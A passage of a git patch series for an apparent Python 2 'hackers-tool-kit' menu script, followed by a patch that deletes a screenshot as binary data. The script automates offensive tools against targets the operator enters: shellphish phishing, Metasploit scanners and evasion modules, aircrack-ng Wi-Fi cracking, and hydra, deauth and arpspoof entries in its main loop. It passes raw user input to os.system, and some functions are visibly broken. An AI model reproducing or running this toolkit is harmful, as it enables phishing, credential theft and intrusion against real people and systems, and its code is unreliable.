EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + +#ABOUT ME / THE CREATOR START# +#----------------------------# +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +#--------------------------# +#ABOUT ME / THE CREATOR END# + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From cfddbf08f2b366d3e5103c205ad07b451a39f2f0 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Wed, 8 May 2019 00:50:17 +0100 Subject: [PATCH 097/214] Delete screenshot2.png --- tools/screenshot2.png | Bin 93638 -> 0 bytes 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 tools/screenshot2.png diff --git a/tools/screenshot2.png b/tools/screenshot2.png deleted file mode 100644 index 669bb99b518cb519bc5dbcac04fa42104db2eff7..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 93638 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 UX6VxM*|T;ohGya+MB2!R0(-EoAro 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 